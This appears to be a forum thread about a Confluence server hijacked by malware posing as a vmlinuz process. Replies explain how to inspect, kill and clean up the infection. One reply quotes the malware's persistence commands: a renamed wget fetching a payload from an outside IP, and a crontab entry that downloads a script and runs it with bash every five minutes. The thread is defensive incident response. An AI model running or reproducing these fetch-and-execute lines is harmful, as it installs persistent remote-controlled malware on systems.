vmlinuz process runs on 100% CPU
Your server looks like hacked.
Please take a look on process list closely.
e.g. run ps auxc
and take a look on process binary sources.
You can use tools like rkhunter to scan your server but in general you should at the beginning kill everything that has been lunched as confluence user, scan your server/account, upgrade your confluence (in most cases user determinate source of attack), and look in your confluence for additional accounts etc.
Is you would like to see what is in that process, take a look on /proc e.g. in ls -la /proc/996
. You will see source binary there too. You can also lunch strace -ff -p 996
to see what process is doing or cat /proc/996/exe | strings
to see what strings that binary have. This is probably some kind of botnet part, miner etc.
I had same problem, it was hacked, the virus script was at /tmp, find the script name from command "top" (insignificance letters,name of "fcbk6hj" was mine. )and kill the processes(maybe 3 processes)
root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKgl root 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl root 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
kill all of them and delete /tmp/prot, and kill the process of /boot/vmlinuz, CPU's back.
I found that virus had dowloaded script to /tmp automatically, my method was mv wgetak to other name.
Virus behavious: wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
found following task was written in crontab, just delete it: */5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
After remove this from system and crontab, maybe is good idea (at least for now) to add confluence user to /etc/cron.deny
.
And after:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information